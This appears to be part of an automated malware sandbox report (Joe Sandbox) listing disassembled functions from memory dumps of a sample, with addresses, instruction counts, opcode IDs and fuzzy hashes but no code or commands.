                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                                                                                                                                                                                                                                                          • Instruction ID: 3e54edccfae4d99a9dc067fb7438e7a0f7318be64c596df77be4d10cba28c441
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E651A173B569104BC71CC93C9DA166AA6D3ABD933076E873DD476CB7D4EE78E8028600
                                                                                                                                                                                                                                                                                          Function 024BB2CF Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction ID: ec09d8d07feab70f4bdf22fcfdb904cc3c4892d8365caa6c3d849920257edd3e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29415776E587148FC329EF64D8C06BBB3A2EFDA318F1E953D89D61B354DAB04D018249
                                                                                                                                                                                                                                                                                          Function 0043B068 Relevance: .2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689
                                                                                                                                                                                                                                                                                          Function 024AB0AF Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction ID: 18739143fc2bfdd9b27d4ece1bca2e3bc02b1a705655674dfedca087045c6feb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1841A1A01083D18AD7368F2980607BBBBE1EFA325DF1849AEC2D5A7683D7754007C759
                                                                                                                                                                                                                                                                                          Function 0042AE48 Relevance: .2, Instructions: 157COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A
                                                                                                                                                                                                                                                                                          Function 0248CB7E Relevance: .2, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction ID: 1886ef0e2a34783752b0448fe39cebd73ef78dac866104b07dd169c35a0afa04
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 464c79d7ef81001f4e361af6555152b884662c27da4a39cdc900ccd1ec23a395
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E551577951C3408BD328DF24D880A6BB7F2EFC6304F18995CF986AB3A5DB309906C756
                                                                                                                                                                                                                                                                                          Function 02495F79 Relevance: .2, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                                          • Instruction ID: a53d6d527b8eca4361064ca06ae8b9aadd675c236848c3e24e7c3388c99ba615
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afec766a8f46cebfa70309c7c12ba714155290e18f5d997497038f4e7e1a0749
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FD4145B1A002418BDB258F39CC917737BE2EF92318F28856ED492CBBA5E7399441CB10
                                                                                                                                                                                                                                                                                          Function 0248C0E8 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0aff5b575bdc1cbf128a6fcaf21673d610ba054c2e19d9dceb1adbeeb882f19a
                                                                                                                                                                                                                                                                                          • Instruction ID: b41d1344dea177b86e3632ad74414e96ff8f6566370b896284136c93e0be55b6
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0aff5b575bdc1cbf128a6fcaf21673d610ba054c2e19d9dceb1adbeeb882f19a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8418A752183808FD7299B24CCD67BB77E0EF96704F18946EE4C2CB292E7254903CB1A
                                                                                                                                                                                                                                                                                          Function 024AB08B Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction ID: 47f10220abf95029be2718c47a7771dfc95221f9e3f2688b976712ae3ca565f8
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 414180A010C3D18AD7268B3490607BBBBD0EBA325DF14599DC2D6A7683D7354007CB5A
                                                                                                                                                                                                                                                                                          Function 0042AE24 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E
                                                                                                                                                                                                                                                                                          Function 024BB2C2 Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                                          • Instruction ID: 6ed591942ba998c6ce51055b20a68ceb9198711a58efa29eb6963cf65e98dbca
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b3442938981b70338c85b6fdcef42b4b1049c4e4fc606aed39a4a87bba456e78
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA418A75A587148FC226AF54DCC06BBB3A2EF86328F1E452DCAE517350E7A08C008664
                                                                                                                                                                                                                                                                                          Function 0043C020 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: e4e9279ef52f96599ba60b9f495eba6a2778b73f1ce77f20ed8f4ad1faa0dcde
                                                                                                                                                                                                                                                                                          • Instruction ID: bdc763d3058119611c7ecd8a8528ac1cd9b09ae5f9eb0b7e174c524916cf2ae7
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e4e9279ef52f96599ba60b9f495eba6a2778b73f1ce77f20ed8f4ad1faa0dcde
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A41F33A308610CFCB08CF78E9E055A73A2FBCB315F29847DD54547622C775A956CB44
                                                                                                                                                                                                                                                                                          Function 024BB2C4 Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                          • Instruction ID: fb576ce599db0631ab191e0336a94bed2d19237e11b0758f1b19b2b1d830c6fb
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE317775A587148FC329EFA8E8C05BBB3A1FF8B318F1E952D89E50B350D7B08D018659
                                                                                                                                                                                                                                                                                          Function 0043B05D Relevance: .1, Instructions: 118COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                          • Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D
                                                                                                                                                                                                                                                                                          Function 024A60F7 Relevance: .1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                          • Instruction ID: 6ab4f39ae6a28cada1ecd310b6611a691ab71650486836608bc6e6ac25e875a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7540190068c50c970c78dd1fb816c39bd2abd836d4de7d463699aecd841a6eb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7441BFB26183908BC734CF24C85179FBAF6EBD1214F498E2CD4CAAB341E73589058B87
                                                                                                                                                                                                                                                                                          Function 024AB05B Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction ID: c5b0531d72c6fe838cefefc8e6f217bbf2851e96bfb4e7688a66f85af5296362
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9B3171A01083D18ADB358F259020BFBBBE0EFA325DF14899EC2D5A7683D7344047CB5A
                                                                                                                                                                                                                                                                                          Function 024AC6C3 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                                          • Instruction ID: 1897558639b5814e2e5fd7a8664c1ae8dc2d19f8559f81b444d7a2ec48490a73
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e0dc337c31b60e59c40b3c4b66153a54b5a75c190226419d79e85c67cff8ed99
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A83139781183C28BD3E58B2888B0BBBBBD2DF93304F28496ED0DA47292CB254445CB56
                                                                                                                                                                                                                                                                                          Function 0042C45C Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 8b560107b2d6cb4b4134e509f7d426598bac8a750c2db8c16c52e4f48a3db998
                                                                                                                                                                                                                                                                                          • Instruction ID: d85d8e7ba49753ff7f36d3ed97c285ab1e5e24199585a0ad528ba1d19501f263
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b560107b2d6cb4b4134e509f7d426598bac8a750c2db8c16c52e4f48a3db998
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B7313B602083A15BD3B58B2864B077F7BD2DF87304F68496DD0C9872A2D7289485C74E
                                                                                                                                                                                                                                                                                          Function 0042ADF4 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E
                                                                                                                                                                                                                                                                                          Function 024A89C0 Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                          • Instruction ID: 7ca21e3234f8b6694d054e6d93b430c09175b952ea1641c4298216a1dcbd43af
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 546c49f651c2ee0ec7203154adbd460b810419c4e5ed9a3c8b647bf01d903c3f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 183144726183448FC724CF648CA06BBB762EFA6748F1D853EDA8683741D775C9018B46
                                                                                                                                                                                                                                                                                          Function 0248DA09 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                          • Instruction ID: 6a2af28f1fb56cc36e3fa169f1384b26f7e51cefd07ca25af218a68f0aaab131
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9879a937105e083bd9aef7d9b8e876d5a873d896f238b78d14b88aad6da131cd
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8631C834A2A501DAE765BB25CC4073A7767FBC6305F78952ED0C1936E8DB349C52CB14
                                                                                                                                                                                                                                                                                          Function 0040D7A2 Relevance: .1, Instructions: 107COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
